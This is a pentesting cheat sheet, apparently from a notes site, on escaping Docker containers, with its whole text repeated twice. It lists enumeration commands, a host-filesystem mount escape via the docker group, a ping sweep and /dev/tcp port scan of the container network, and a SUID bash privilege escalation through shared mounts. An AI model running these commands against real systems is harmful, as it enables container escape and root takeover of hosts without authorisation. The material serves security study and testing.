Escaping Docker

`Enumeration`

Check for the Presence of .dockerenv

Finding this file can confirm you're inside a container and give insight into the container environment.
Tools like nsenter or docker-exploit can be used to attempt escaping the container.
If the user is in the docker group, attempt to run the following command to mount the host filesystem and gain access to the host:

docker run -v /:/mnt -it bash bash

Identify Active Containers

List all running containers:

docker ps

Check for containers running with elevated privileges (--privileged, --cap-add).
Look for containers that share host namespaces or file systems.

Check for Docker Images (Local Images on Host)

docker images

Check for File Permissions Showing Numeric IDs

When the host's user information does not exist inside the container’s /etc/passwd file, file permissions will show numeric IDs instead of human-readable names.

Check for Access to Host Network Information

This file contains the routing table of the host system and can provide valuable insights into the host network that may help in lateral movement or further attacks:

cat /proc/net/fib_trie

Check for Mounted File Systems

Mounting directories or files from the host system into the container exposes host data to the container:

cat /proc/mounts

mount | grep <directory>

Verify Container Privileges

Look for containers running as root or with --privileged mode:

Container’s settings

docker inspect

See if it is running as root:

cat /proc/self/status

Check the process inside the container:

ps aux

Test for Namespace Leaks

Check the namespaces that the container uses:

cat /proc/self/ns/

Investigate Container File System for SUID/SGID Binaries

find / -type f \( -perm -4000 -o -perm -2000 \)

Check for Docker Socket Exposure

mount | grep docker.sock

Look for Docker Vulnerabilities and Misconfigurations

cat /etc/docker/daemon.json

Investigate the private virtual network

Docker containers typically run in a private virtual network created by Docker, and the default network uses a subnet in the range 172.16.0.0/12

Ping Sweep

for i in {1..254}; do (ping -c 1 172.19.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;

Port Scan

for port in {1..65535}; do echo > /dev/tcp/172.19.0.1/$port && echo "$port open"; done 2>/dev/null

`File Ownership Manipulation via Shared Mounts`

Check permissions and ownership when you create a file from host and container:

touch from_host
touch from_container

If the container is miss configured and can creates files as a root, and you can access the files created by the host on the container:
1. From the host, copy bash in to the mounted directory.
2. From the container, change the ownership and permissions of bash to root.
3. Execute bash as root.

cp /bin/bash .
chown root:root bash; chmod 4777 bash
./bash -p

PreviousBuffer Overflow - Linux NextNFC

Last updated 2 months ago

Escaping Docker

`Enumeration`

Check for the Presence of .dockerenv

Finding this file can confirm you're inside a container and give insight into the container environment.
Tools like nsenter or docker-exploit can be used to attempt escaping the container.
If the user is in the docker group, attempt to run the following command to mount the host filesystem and gain access to the host:

docker run -v /:/mnt -it bash bash

Identify Active Containers

List all running containers:

docker ps

Check for containers running with elevated privileges (--privileged, --cap-add).
Look for containers that share host namespaces or file systems.

Check for Docker Images (Local Images on Host)

docker images

Check for File Permissions Showing Numeric IDs

When the host's user information does not exist inside the container’s /etc/passwd file, file permissions will show numeric IDs instead of human-readable names.

Check for Access to Host Network Information

This file contains the routing table of the host system and can provide valuable insights into the host network that may help in lateral movement or further attacks:

cat /proc/net/fib_trie

Check for Mounted File Systems

Mounting directories or files from the host system into the container exposes host data to the container:

cat /proc/mounts

mount | grep <directory>

Verify Container Privileges

Look for containers running as root or with --privileged mode:

Container’s settings

docker inspect

See if it is running as root:

cat /proc/self/status

Check the process inside the container:

ps aux

Test for Namespace Leaks

Check the namespaces that the container uses:

cat /proc/self/ns/

Investigate Container File System for SUID/SGID Binaries

find / -type f \( -perm -4000 -o -perm -2000 \)

Check for Docker Socket Exposure

mount | grep docker.sock

Look for Docker Vulnerabilities and Misconfigurations

cat /etc/docker/daemon.json

Investigate the private virtual network

Docker containers typically run in a private virtual network created by Docker, and the default network uses a subnet in the range 172.16.0.0/12

Ping Sweep

for i in {1..254}; do (ping -c 1 172.19.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;

Port Scan

for port in {1..65535}; do echo > /dev/tcp/172.19.0.1/$port && echo "$port open"; done 2>/dev/null

`File Ownership Manipulation via Shared Mounts`

Check permissions and ownership when you create a file from host and container:

touch from_host
touch from_container

If the container is miss configured and can creates files as a root, and you can access the files created by the host on the container:
1. From the host, copy bash in to the mounted directory.
2. From the container, change the ownership and permissions of bash to root.
3. Execute bash as root.

cp /bin/bash .
chown root:root bash; chmod 4777 bash
./bash -p

PreviousBuffer Overflow - Linux NextNFC

Last updated 2 months ago